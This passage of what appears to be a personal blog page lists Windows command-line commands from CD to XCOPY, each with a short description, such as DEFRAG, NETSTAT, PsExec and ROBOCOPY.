
CD Change Directory - move to a specific Folder

CHANGE Change Terminal Server Session properties

CHKDSK Check Disk - check and repair disk problems

CHKNTFS Check the NTFS file system

CHOICE Accept keyboard input to a batch file

CIPHER Encrypt or Decrypt files/folders

CleanMgr Automated cleanup of Temp files, recycle bin

CLEARMEM Clear memory leaks

CLIP Copy STDIN to the Windows clipboard.

CLS Clear the screen

CLUSTER Windows Clustering

CMD Start a new CMD shell

COLOR Change colors of the CMD window

COMP Compare the contents of two files or sets of files

COMPACT Compress files or folders on an NTFS partition

COMPRESS Compress individual files on an NTFS partition

CON2PRT Connect or disconnect a Printer

CONVERT Convert a FAT drive to NTFS.

COPY Copy one or more files to another location

CSVDE Import or Export Active Directory data



DATE Display or set the date

Dcomcnfg DCOM Configuration Utility

DEFRAG Defragment hard drive

DEL Delete one or more files

DELPROF Delete NT user profiles

DELTREE Delete a folder and all subfolders

DevCon Device Manager Command Line Utility

DIR Display a list of files and folders

DIRUSE Display disk usage

DISKCOMP Compare the contents of two floppy disks

DISKCOPY Copy the contents of one floppy disk to another

DNSSTAT DNS Statistics

DOSKEY Edit command line, recall commands, and create macros

DSADD Add user (computer, group..) to active directory

DSQUERY List items in active directory

DSMOD Modify user (computer, group..) in active directory



ECHO Display message on screen

ENDLOCAL End localisation of environment changes in a batch file

ERASE Delete one or more files

EXIT Quit the CMD shell

EXPAND Uncompress files

EXTRACT Uncompress CAB files



FC Compare two files

FDISK Disk Format and partition

FIND Search for a text string in a file

FINDSTR Search for strings in files

FOR Conditionally perform a command several times

FORFILES Batch process multiple files

FORMAT Format a disk

FREEDISK Check free disk space (in bytes)

FSUTIL File and Volume utilities

FTP File Transfer Protocol

FTYPE Display or modify file types used in file extension associations



GLOBAL Display membership of global groups

GOTO Direct a batch program to jump to a labelled line



HELP Online Help

HFNETCHK Network Security Hotfix Checker



IF Conditionally perform a command

IFMEMBER Is the current user in an NT Workgroup

IPCONFIG Configure IP



KILL Remove a program from memory



LABEL Edit a disk label

LOCAL Display membership of local groups

LOGEVENT Write text to the NT event viewer.

LOGOFF Log a user off

LOGTIME Log the date and time in a file



MAPISEND Send email from the command line

MEM Display memory usage

MD Create new folders

MODE Configure a system device

MORE Display output, one screen at a time

MOUNTVOL Manage a volume mount point

MOVE Move files from one folder to another

MOVEUSER Move a user from one domain to another

MSG Send a message

MSIEXEC Microsoft Windows Installer

MSINFO Windows NT diagnostics

MSTSC Terminal Server Connection (Remote Desktop Protocol)

MUNGE Find and Replace text within file(s)

MV Copy in-use files



NET Manage network resources

NETDOM Domain Manager

NETSH Configure network protocols

NETSVC Command-line Service Controller

NBTSTAT Display networking statistics (NetBIOS over TCP/IP)

NETSTAT Display networking statistics (TCP/IP)

NOW Display the current Date and Time

NSLOOKUP Name server lookup

NTBACKUP Backup folders to tape

NTRIGHTS Edit user account rights



PATH Display or set a search path for executable files

PATHPING Trace route plus network latency and packet loss

PAUSE Suspend processing of a batch file and display a message

PERMS Show permissions for a user

PERFMON Performance Monitor

PING Test a network connection

POPD Restore the previous value of the current directory saved by PUSHD

PORTQRY Display the status of ports and services

PRINT Print a text file

PRNCNFG Display, configure or rename a printer

PRNMNGR Add, delete, list printers set the default printer

PROMPT Change the command prompt

PsExec Execute process remotely

PsFile Show files opened remotely

PsGetSid Display the SID of a computer or a user

PsInfo List information about a system

PsKill Kill processes by name or process ID

PsList List detailed information about processes

PsLoggedOn Who's logged on (locally or via resource sharing)

PsLogList Event log records

PsPasswd Change account password

PsService View and control services

PsShutdown Shutdown or reboot a computer

PsSuspend Suspend processes

PUSHD Save and then change the current directory



QGREP Search file(s) for lines that match a given pattern.



RASDIAL Manage RAS connections

RASPHONE Manage RAS connections

RECOVER Recover a damaged file from a defective disk.

REG Read, Set or Delete registry keys and values

REGEDIT Import or export registry settings

REGSVR32 Register or unregister a DLL

REGINI Change Registry Permissions

REM Record comments (remarks) in a batch file

REN Rename a file or files.

REPLACE Replace or update one file with another

RD Delete folder(s)

RDISK Create a Recovery Disk

RMTSHARE Share a folder or a printer

ROBOCOPY Robust File and Folder Copy

ROUTE Manipulate network routing tables

RUNAS Execute a program under a different user account

RUNDLL32 Run a DLL command (add/remove print connections)



SC Service Control

SCHTASKS Create or Edit Scheduled Tasks

SCLIST Display NT Services

ScriptIt Control GUI applications

SET Display, set, or remove environment variables

SETLOCAL Begin localisation of environment changes in a batch file

SETX Set environment variables permanently

SHARE List or edit a file share or print share

SHIFT Shift the position of replaceable parameters in a batch file

SHORTCUT Create a windows shortcut (.LNK file)

SHOWGRPS List the NT Workgroups a user has joined

SHOWMBRS List the Users who are members of a Workgroup

SHUTDOWN Shutdown the computer

SLEEP Wait for x seconds

SOON Schedule a command to run in the near future

SORT Sort input

START Start a separate window to run a specified program or command

SU Switch User

SUBINACL Edit file and folder Permissions, Ownership and Domain

SUBST Associate a path with a drive letter

SYSTEMINFO List system configuration



TASKLIST List running applications and services

TIME Display or set the system time

TIMEOUT Delay processing of a batch file

TITLE Set the window title for a CMD.EXE session

TOUCH Change file timestamps

TRACERT Trace route to a remote host

TREE Graphical display of folder structure

TYPE Display the contents of a text file



USRSTAT List domain usernames and last login



VER Display version information

VERIFY Verify that files have been saved

VOL Display a disk label



WHERE Locate and display files in a directory tree

WHOAMI Output the current UserName and domain

WINDIFF Compare the contents of two files or sets of files

WINMSD Windows system diagnostics

WINMSDP Windows system diagnostics II

WMIC WMI Commands



XCACLS Change file permissions

XCOPY Copy files and folders

Followers


junkelse by Junkelse. Powered by Blogger and Supported by kuchino.blogspot.com